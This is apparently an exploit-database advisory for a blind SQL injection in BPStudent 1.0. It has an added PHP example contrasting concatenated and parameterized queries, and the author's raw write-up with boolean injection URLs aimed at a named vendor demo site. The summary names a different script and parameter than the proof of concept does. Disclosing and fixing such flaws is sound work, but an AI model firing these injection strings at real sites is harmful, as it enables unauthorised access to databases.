Vendor: BPStudent
By: OoN_Boy
CVSS: 8.8 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: BPStudent
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: cpe:a:bpowerhouse:bpstudent:1.0
Platforms Tested: Windows, Linux, Mac
Year: 2009

BPStudent 1.0 blind SQL Vulnerabilities

BPStudent 1.0 is vulnerable to blind SQL injection, which allows an attacker to execute arbitrary SQL queries against the application's database. This can be exploited to gain access to the database and the underlying system. The vulnerability is located in the 'id' parameter of the 'index.php' script: SQL code injected into the 'id' parameter value is executed as part of the query.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries.
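
The following is an added example, not BPStudent's code or the advisory author's: it contrasts string-concatenated SQL with a validated, parameterized query, using a true/false input pair shaped like the proof of concept further down this page. The `tests` table, both function names and the in-memory SQLite database (a stand-in for MySQL so the script runs offline) are assumptions.

```php
<?php
// Added example. Hypothetical schema and function names: BPStudent's real code
// is not shown on the page. SQLite in memory stands in for MySQL (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tests (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO tests (id, title) VALUES (1, 'Algebra exam')");

// Vulnerable pattern: the request value is concatenated into the SQL text,
// so anything after the number is parsed as part of the WHERE clause.
function previewConcatenated(PDO $db, string $test): bool
{
    $row = $db->query('SELECT title FROM tests WHERE id = ' . $test)->fetch();
    return $row !== false;
}

// Hardened pattern: reject anything that is not a positive integer,
// then bind the value as a typed parameter instead of splicing it into SQL.
function previewParameterized(PDO $db, string $test): bool
{
    $id = filter_var($test, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return false; // invalid input: no query is run at all
    }
    $stmt = $db->prepare('SELECT title FROM tests WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch() !== false;
}

// Constructed inputs: a normal id, then a condition that is true and one that is false.
$inputs = ['1', '1 and 1=1', '1 and 1=2'];
foreach ($inputs as $in) {
    printf("%-10s concatenated=%-5s parameterized=%s\n",
        $in,
        var_export(previewConcatenated($db, $in), true),
        var_export(previewParameterized($db, $in), true));
}
```

With concatenation the page renders differently for the true and the false condition, which is the signal a blind injection relies on; the parameterized version gives the same answer for both because the appended condition never reaches the SQL parser.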

Exploit-DB raw data:

[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: BPStudent 1.0 blind SQL Vulnerabilities									    |
 | Software 		: BPStudent													    |
 | Vendor   		: http://bpowerhouse.info											    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Technology		: PHP5                                                                                                              |
 | Database		: MySQL                                                                                                             |
 | Version		: 1.0                                                                                                               |
 | License		: GNU GPL                                                                                                           |
 | Price		: $27.90                                                                                                            |
 | Description		: This script is an on-site school script: students can register, download study material and take exams; the system |
 |			  will mark the exams and students can graduate courses; administrators can create exams, manage students and courses |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Google Dork 		: find it yourself :)												    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/students.php?page=preview&test=[sql]			 	 			    |
 | Admin Page		: http://localhost/[path]/admin/index.php									    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Proof of concept	: http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=5 True  |
 |			  http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=4 False |
 | 			: You must log in to try the exploit :)									    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Note			: Happy Eid al-Fitr, and please forgive me, body and soul; forgive my mistakes up to now, everyone :)		    |
 |			  running off.... for a while.... bye bye.....								    |
[x]========================================================================================================================================[x]